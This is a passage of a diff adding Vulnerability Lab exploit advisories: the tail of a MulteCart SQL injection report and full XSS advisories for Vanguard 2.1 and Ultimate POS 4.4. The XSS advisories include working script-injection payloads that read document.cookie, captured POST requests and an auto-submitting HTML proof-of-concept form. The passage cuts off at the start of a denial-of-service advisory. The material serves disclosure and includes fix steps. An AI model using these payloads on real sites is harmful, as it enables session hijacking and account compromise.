check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 in /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php:1299
|
||||
-
|
||||
Stack trace:
|
||||
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1299): PDOStatement->execute()
|
||||
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
|
||||
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
|
||||
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
|
||||
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
|
||||
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
|
||||
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
|
||||
#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
|
||||
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
|
||||
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
|
||||
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
|
||||
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
|
||||
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
|
||||
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
|
||||
#14 {main}
|
||||
-
|
||||
Next yiidbException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
|
||||
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
|
||||
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=-1' in /home/test/MulteCart/vendor/yiisoft/yii2/db/Schema.php:678
|
||||
-
|
||||
Stack trace:
|
||||
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1304): yiidbSchema->convertException(Object(PDOException), 'SELECT * FROM `...')
|
||||
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
|
||||
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
|
||||
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
|
||||
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
|
||||
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
|
||||
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
|
||||
#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
|
||||
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
|
||||
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
|
||||
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
|
||||
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
|
||||
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
|
||||
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
|
||||
#14 {main}
|
||||
Debug Array:
|
||||
[0] => 42000
|
||||
[1] => 1064
|
||||
[2] => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
|
||||
-
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://multecartultimate.localhost:8080/vendor/vendor/view
|
||||
https://multecartultimate.localhost:8080/customer/customer/view
|
||||
https://multecartultimate.localhost:8080/inventory/inventory/update
|
||||
https://multecartultimate.localhost:8080/order/sub-order/view-order
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be resolved by the following description ...
|
||||
1. Disable to display the sql errors for other users then the admin or pipe it into a local log file outside the panel ui
|
||||
2. Use a prepared statement to protect the query against further injection attacks
|
||||
3. Restrict the vulnerable id parameter to disallow usage of special chars of post and get method requests
|
||||
4. Encode and escape the id content on get method request with the id parameter
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
222
exploits/php/webapps/50491.txt
Normal file
222
exploits/php/webapps/50491.txt
Normal file
|
@ -0,0 +1,222 @@
|
|||
# Exploit Title: Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
|
||||
# Date: 2021-10-26
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
|
||||
# Version: 2.1
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Vanguard v2.1 - (Search) POST Inject Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2283
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-26
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2283
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
4
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Non Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a post inject web vulnerability in the Vanguard v2.1 cms web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
VanguardInfini
|
||||
Product: Vanguard v2.1 - CMS (PHP) (Web-Application)
|
||||
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-10-26: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Pre Auth (No Privileges or Session)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A non-persistent post inject web vulnerability has been discovered in the official Vanguard v2.1 cms web-application.
|
||||
The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user
|
||||
session data or to manipulate application contents for clients.
|
||||
|
||||
The vulnerability is located in the phps_query parameter of the search module. The vulnerability is a classic post
|
||||
injection web vulnerability with non-persistent attack vector.
|
||||
|
||||
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent
|
||||
external redirects to malicious source and non-persistent manipulation of affected application modules.
|
||||
|
||||
Request method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Search
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] phps_query
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.
|
||||
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Vulnerable Source: search
|
||||
<div class="ui yellow basic segment"></div>
|
||||
<div class="ui container" style="margin-top: -0.7em;">
|
||||
<form method="POST" action="https://vanguard.squamifer.ovh/search">
|
||||
<div class="ui action input fluid">
|
||||
<input name="phps_query" type="text" value=""><iframe src=a onload=alert(document.cookie)>" placeholder="Search for a product...">
|
||||
<button class="ui button" type="submit" name="phps_search"><i class="search icon"></i>Search</button></div></form>
|
||||
<div class="ui divider"></div>
|
||||
<div class="ui cards aligned centered">
|
||||
<div class="alert color blue-color"><div class="ui hidden divider"></div>
|
||||
<div class="ui icon info message"><i class="help circle icon"></i><div class="content">
|
||||
<div class="header">No results found for <strong><iframe src=evil.source onload=alert(document.cookie)></strong>.</div></div></div></div>
|
||||
</div></div></div>
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] ---
|
||||
https://vanguard.localhost:8080/search
|
||||
Host: vanguard.localhost:8080
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 86
|
||||
Origin: https://vanguard.localhost:8080
|
||||
Connection: keep-alive
|
||||
Referer: https://vanguard.localhost:8080/
|
||||
Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8
|
||||
phps_query=">%20<iframe src=evil.source onload=alert(document.cookie)>&phps_search=;)
|
||||
-
|
||||
POST: HTTP/2.0 200 OK
|
||||
content-type: text/html; charset=UTF-8
|
||||
pragma: no-cache
|
||||
cache-control: private
|
||||
vary: Accept-Encoding
|
||||
|
||||
|
||||
Exploitation: PoC
|
||||
<html>
|
||||
<head>
|
||||
<title>PoC</title>
|
||||
<style type="text/css">
|
||||
#nodisplay {
|
||||
display:none;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div id="nodsiplay">
|
||||
<form action="https://vanguard.localhost:8080/search" method="post">
|
||||
<input type="text" name="phps_query" value=">%20<iframe src=evil.source onload=alert(document.cookie)>"/>
|
||||
</form>
|
||||
</div>
|
||||
<script>
|
||||
function submitForm() {
|
||||
document.forms[0].submit();
|
||||
}
|
||||
submitForm();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the validation web vulnerability in the web-application is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
257
exploits/php/webapps/50492.txt
Normal file
257
exploits/php/webapps/50492.txt
Normal file
|
@ -0,0 +1,257 @@
|
|||
# Exploit Title: Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
|
||||
# Date: 2021-10-26
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://ultimatefosters.com/docs/ultimatepos/
|
||||
# Version: 4.4
|
||||
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2296
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-26
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2296
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.6
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
The Ultimate POS is a erp, stock management, point of sale & invoicing web-application.
|
||||
The application uses a mysql database management system in combination with php 7.2.
|
||||
|
||||
(Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ )
|
||||
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the Ultimate POS v4.4 erp stock management web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
thewebfosters
|
||||
Ultimate POS v4.4 - ERP (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-10-26: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Moderator Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent cross site web vulnerability has been discovered in the Ultimate POS v4.4 erp stock management web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
|
||||
browser to web-application requests from the application-side.
|
||||
|
||||
The persistent validation web vulnerability is located in the name parameter of the add products module.
|
||||
Remote attackers with privileges as vendor to add products are able to inject own malicious script codes.
|
||||
The request method to inject is post and the attack vector is persistent. Injects are possible via edit
|
||||
or by a new create of a product.
|
||||
|
||||
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks,
|
||||
persistent external redirects to malicious source and persistent manipulation of affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Products (Add)
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Product Name
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] name
|
||||
|
||||
Affected Module(s):
|
||||
[+] Products List
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent web vulnerability can be exploited by remote attackers with privileged application account and with low user interaction.
|
||||
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Payload
|
||||
test"><iframe src="evil.source" onload=alert(document.cookie)></iframe>
|
||||
test"><img src="evil.source" onload=alert(document.cookie)></img>
|
||||
|
||||
|
||||
---- PoC Session Logs (POST) [Add] ---
|
||||
https://pos-uf.localhost.com:8000/products
|
||||
Host: pos-uf.localhost.com:8000
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Content-Type: multipart/form-data; boundary=---------------------------241608710739044240961361918599
|
||||
Content-Length: 3931
|
||||
Origin: https://pos-uf.localhost.com:8000
|
||||
Connection: keep-alive
|
||||
Referer: https://pos-uf.localhost.com:8000/products/create
|
||||
Cookie: ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvV
|
||||
nhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9
|
||||
_token=null&name=test"><iframe src=evil.source onload=alert(document.cookie)></iframe>&sku=&barcode_type=C128&unit_id=1&brand_id=
|
||||
&category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure=
|
||||
&weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive
|
||||
&type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit
|
||||
-
|
||||
POST: HTTP/3.0 200 OK
|
||||
content-type: text/html; charset=UTF-8
|
||||
location: https://pos-uf.localhost.com:8000
|
||||
set-cookie: ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptb
|
||||
khvdjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D; Max-Age=7200; path=/; httponly
|
||||
|
||||
|
||||
---- PoC Session Logs (POST) [Edit] ---
|
||||
https://pos-uf.localhost.com:8000/products/23
|
||||
Host: pos-uf.localhost.com:8000
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Content-Type: multipart/form-data; boundary=---------------------------407073296625600179063246902867
|
||||
Content-Length: 4064
|
||||
Origin: https://pos-uf.localhost.com:8000
|
||||
Connection: keep-alive
|
||||
Referer: https://pos-uf.localhost.com:8000/products/23/edit
|
||||
Cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
|
||||
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmNmIwYzljMTBmZGUwNzE0In0%3D
|
||||
_method=PUT&_token=null&name=test_products"><iframe src=evol.source onload=alert(document.cookie)></iframe>&sku=2&barcode_type=C128&unit_id=1&brand_id=&category_id=&sub_category_id=&product_locations[]=1&enable_stock=1&alert_quantity=2.00&product_description=&image=&product_brochure=&weight=4&product_custom_field1=3&product_custom_field2=5&product_custom_field3=1&product_custom_field4=2
|
||||
&woocommerce_disable_sync=0&tax=&tax_type=exclusive&single_variation_id=204&single_dpp=1.00&single_dpp_inc_tax=1.00
|
||||
&profit_percent=0.00&single_dsp=1.00&single_dsp_inc_tax=1.00&variation_images[]=&submit_type=submit
|
||||
-
|
||||
POST: HTTP/3.0 200 OK
|
||||
content-type: text/html; charset=UTF-8
|
||||
location: https://pos-uf.localhost.com:8000/products
|
||||
set-cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
|
||||
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmN
|
||||
mIwYzljMTBmZGUwNzE0In0%3D; Max-Age=7200; path=/; httponly
|
||||
|
||||
|
||||
Vulnerable Source: Products (list - name)
|
||||
<tbody><tr data-href="https://pos-uf.localhost.com:8000/products/view/158" role="row" class="odd"><td class="selectable_td">
|
||||
<input type="checkbox" class="row-select" value="158"></td><td><div style="display: flex;">
|
||||
<img src="https://pos-uf.localhost.com:8000/img/default.png" alt="Product image" class="product-thumbnail-small"></div></td>
|
||||
<td><div class="btn-group"><button type="button" class="btn btn-info dropdown-toggle btn-xs" data-toggle="dropdown" aria-expanded="false">
|
||||
Actions<span class="caret"></span><span class="sr-only">Toggle Dropdown</span></button><ul class="dropdown-menu dropdown-menu-left" role="menu"><li>
|
||||
<a href="https://pos-uf.localhost.com:8000/labels/show?product_id=158" data-toggle="tooltip" title="Print Barcode/Label"><i class="fa fa-barcode">
|
||||
</i> Labels</a></li><li><a href="https://pos-uf.localhost.com:8000/products/view/158" class="view-product"><i class="fa fa-eye"></i> View</a></li>
|
||||
<li><a href="https://pos-uf.localhost.com:8000/products/158/edit"><i class="glyphicon glyphicon-edit"></i> Edit</a></li><li>
|
||||
<a href="https://pos-uf.localhost.com:8000/products/158" class="delete-product"><i class="fa fa-trash"></i> Delete</a></li><li class="divider">
|
||||
</li><li><a href="#" data-href="https://pos-uf.localhost.com:8000/opening-stock/add/158" class="add-opening-stock"><i class="fa fa-database">
|
||||
</i> Add or edit opening stock</a></li><li><a href="https://pos-uf.localhost.com:8000/products/stock-history/158"><i class="fas fa-history">
|
||||
</i> Product stock history</a></li><li><a href="https://pos-uf.localhost.com:8000/products/create?d=158"><i class="fa fa-copy">
|
||||
</i> Duplicate Product</a></li></ul></div></td><td class="sorting_1">aa"><iframe src="a" onload="alert(document.cookie)"></iframe>
|
||||
<br><i class="fab fa-wordpress"></i></td><td>Awesome Shop</td><td><div style="white-space: nowrap;">$ 1.00 </div></td><td>
|
||||
<div style="white-space: nowrap;">$ 1.25 </div></td><td> 0 Pieces</td><td>Single</td><td> </td><td></td><td></td><td>AS0158</td>
|
||||
<td></td><td></td><td></td><td></td></tr><tr data-href="https://pos-uf.localhost.com:8000/products/view/17" role="row" class="even">
|
||||
<td class="selectable_td"><input type="checkbox" class="row-select" value="17"></td><td><div style="display: flex;">
|
||||
<img src="https://pos-uf.localhost.com:8000/uploads/img/1528727793_acerE15.jpg" alt="Product image" class="product-thumbnail-small"></div></td>
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://pos-uf.localhost.com:8000/products/
|
||||
https://pos-uf.localhost.com:8000/products/view/
|
||||
https://pos-uf.localhost.com:8000/products/23/edit
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be resolved by the following steps ...
|
||||
1. Restrict the input on product names to disallow special chars
|
||||
2. Encode and filter the input transmitted via post in the name parameter
|
||||
3. Escape and sanitize the output in the products listing of the backend
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
166
exploits/windows/local/50484.txt
Normal file
166
exploits/windows/local/50484.txt
Normal file
|
@ -0,0 +1,166 @@
|
|||
# Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
|
||||
# Date: 2021-10-18
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://www.cinspiration.de/uebersicht4.html
|
||||
# Software Link: https://www.cinspiration.de/download.html
|
||||
# Version: 4.9.9.3
|
||||
# Tested on: Linux
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
RDP Manager v4.9.9.3 - Local Denial of Servie Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2309
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-18
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2309
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
3.6
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Denial of Service
|
||||
|
||||
